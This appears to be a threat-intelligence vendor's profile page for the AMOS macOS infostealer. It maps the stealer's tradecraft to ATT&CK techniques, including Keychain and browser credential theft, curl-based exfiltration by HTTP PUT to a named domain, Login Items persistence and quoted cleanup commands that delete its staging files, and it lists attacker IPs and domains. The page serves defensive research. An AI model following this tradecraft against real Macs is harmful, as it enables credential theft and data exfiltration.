Skip to main content
Mallory
Back to malware
Malware

Amos Stealer

AMOS Stealer is a macOS-focused information stealer targeting Apple Mac systems. The content describes it as a prominent and highly active malware family, commonly sold as malware-as-a-service through Telegram and underground forums, and used in financially motivated campaigns. It steals browser passwords, session cookies, and autofill data from browsers including Google Chrome and Microsoft Edge on macOS, copies the macOS Keychain database file login.keychain-db to access saved credentials, and searches the user home directory for sensitive files such as .kube, .ssh, .zshrc, and .gitconfig. Observed tradecraft includes use of native macOS utilities such as curl, zsh, AppleScript, ditto, and OpenSSL to download payloads, collect data, compress it into /tmp/osalogging.zip, split archives into 10 MB chunks, generate upload session IDs, exfiltrate data via HTTP PUT, retry failed uploads, and remove artifacts such as /tmp/osalogging.zip and /tmp/sync after successful theft. One reported exfiltration destination was the attacker-controlled domain bestbuydomain.com. The malware has been distributed through deceptive software downloads, fake websites, social-engineering lures, cracked apps, malvertising, compromised websites, fake GitHub repository download links, AI-platform abuse, and ClickFix-style lures. Specific delivery contexts in the content include ClearFake campaigns on compromised websites, Bash-based ClickFix lures, malicious OpenClaw/ClawHub skills that used a base64-encoded command to connect to 91.92.242[.]30 and download the payload, and SEO-poisoned or AI-poisoned search results leading users to malicious ChatGPT and Grok conversations or LLM-written tutorials that trick victims into executing malicious macOS Terminal commands. The content also states that AMOS Stealer uses macOS Login Items persistence via the com.apple.loginwindow AutoLaunchedApplicationDictionary mechanism. Infrastructure references in the content include 91.92.242[.]30, bestbuydomain.com, and domains systellis.com and wusetail.com. The malware has been observed alongside or within broader ecosystems involving ClearFake, ShadowSyndicate-linked infrastructure, and neighboring hosting associated with Rhadamanthys, DCRat, HijackLoader, Lumma, Vidar, and other malware families. The described impact includes credential theft, persistent malware infection, data exfiltration, exposure of corporate credentials, and potential data breaches and financial theft.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

23 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583Acquire InfrastructureEvidence1

Shown above: Malicious ad leading to page for AMOS Stealer.

T1583.006Web ServicesEvidence2

"EU/EEA-focused malvertising was observed... Targets users searching for developer tools"

Initial Access

2 techniques
T1189Drive-by CompromiseEvidence1

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique.

T1195Supply Chain CompromiseEvidence2

An active malware distribution campaign abusing two prominent AI platforms Hugging Face and ClawHub to deliver trojans, cryptominers, and infostealers disguised as legitimate AI tools and agent extensions. The campaign marks a significant evolution in supply chain attacks, shifting from traditional software repositories to trusted AI ecosystems.

Execution

5 techniques
T1059Command and Scripting InterpreterEvidence1

Shown above: Text from the fake Brew page pasted into a terminal Window.

T1059.002AppleScriptEvidence2

Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data.

T1059.004Unix ShellEvidence2

Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data.

T1204User ExecutionEvidence1

"Victims ... downloaded the installer from the altered link. On Windows systems, this resulted in the execution of malware including HijackLoader, while on macOS systems, it led to infection with AMOS Stealer."

T1204.002Malicious FileEvidence1

When users install these packages without verifying, malicious payloads can be executed automatically, potentially installing malware.

Persistence

1 technique
T1547.015Login ItemsEvidence1

MacOS maintains a list of applications that should be automatically opened when a user logs in. This list is stored in the com.apple.loginwindow preferences domain under the key AutoLaunchedApplicationDictionary ... it is the programmatic equivalent of a user manually adding an app to their “Login Items” in System Settings.

Privilege Escalation

1 technique
T1547.015Login ItemsEvidence1

MacOS maintains a list of applications that should be automatically opened when a user logs in. This list is stored in the com.apple.loginwindow preferences domain under the key AutoLaunchedApplicationDictionary ... it is the programmatic equivalent of a user manually adding an app to their “Login Items” in System Settings.

Stealth

3 techniques
T1027Obfuscated Files or InformationEvidence2

For Windows targets, payloads were detected as trojans packed with VMProtect... A second Windows payload used a 30-byte XOR key to decrypt strings at runtime... The FAKESECURITY campaign used a batch script (CDC1.bat) containing an encoded PowerShell blob...

T1036MasqueradingEvidence1

Shown above: Fake Homebrew (Brew) page.

T1070.004File DeletionEvidence1

After a successful upload, Amos Stealer runs the cleanup commands ( rm -f /tmp/osalogging.zip and rm -rf /tmp/sync ) to erase its presence.

Credential Access

3 techniques
T1539Steal Web Session CookieEvidence1

It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

T1555Credentials from Password StoresEvidence1

Investigation also revealed that the info-stealer copies the macOS Keychain database file, named login.keychain-db , to access saved corporate login details.

T1555.003Credentials from Web BrowsersEvidence1

It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

Collection

3 techniques
T1005Data from Local SystemEvidence1

It also searches the user’s home path for confidential developer configuration files and keys, including .kube, .ssh, .zshrc , and .gitconfig .

T1074.001Local Data StagingEvidence1

the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder.

T1560Archive Collected DataEvidence1

the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder.

Command and Control

2 techniques
T1071Application Layer ProtocolEvidence1

COMMAND AND CONTROL (T1071, T1102) VenomRAT → 178.22.24.175:4449; QuasarRAT → 178.22.24.175:4782; AsyncRAT → 178.22.24.175:2022

T1105Ingress Tool TransferEvidence3

Researchers noted that the malware operators use a built-in macOS utility called curl to download the malicious files silently.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

Amos Stealer then sends the data to the attacker-controlled server address (bestbuydomain.com) using an HTTP PUT request via curl.

Other

1 technique
T1656ImpersonationEvidence2

in the latest campaign, the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
6 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in apptoday
ip.v4●●●●●●●●●●●●View more in app1 month ago
uri●●●●●●●●●●●●View more in app2 months ago
domain●●●●●●●●●●●●View more in app2 months ago
hash.sha256●●●●●●●●●●●●View more in app2 months ago
uri●●●●●●●●●●●●View more in app2 months ago
ACTIVITY FEED

Recent activity

22 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

22 SOURCESView more in app
hackreadNews
Jun 16, 2026
Amos Stealer Targets macOS Keychain Files and Browser Passwords

A macOS-focused information stealer used in financially motivated campaigns. It steals browser passwords, session cookies, autofill data, copies the macOS Keychain database, collects developer configuration files and keys, compresses stolen data, exfiltrates it to attacker-controlled infrastructure via curl, and removes artifacts afterward.

Read more
cyber security newsNews
May 8, 2026
Hackers Leveraged Hugging Face and ClawHub With 575+ Malicious Skills to Deploy Malware

A macOS-focused infostealer delivered in this campaign via malicious AI platform content; it is described as being sold as malware-as-a-service through Telegram and underground forums.

Read more
acronis blogNews
Apr 30, 2026
Poisoning the well: AI supply chain attacks on Hugging Face and OpenClaw

A macOS-focused infostealer distributed via malicious OpenClaw skills in this campaign. It is delivered through staged shell scripts that download and execute the payload from attacker-controlled infrastructure.

Read more
jpcert blogNews
Mar 6, 2026
JSAC2026 -Workshop/Lightning Talk Session/Panel Discussion- - JPCERT/CC Eyes | JPCERT Coordination Center official Blog

macOS infostealer delivered via a malvertising + GitHub repository abuse chain that redirects victims to a malicious commit/README download link for a trojanized installer.

Read more
+18 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching14

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping23

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.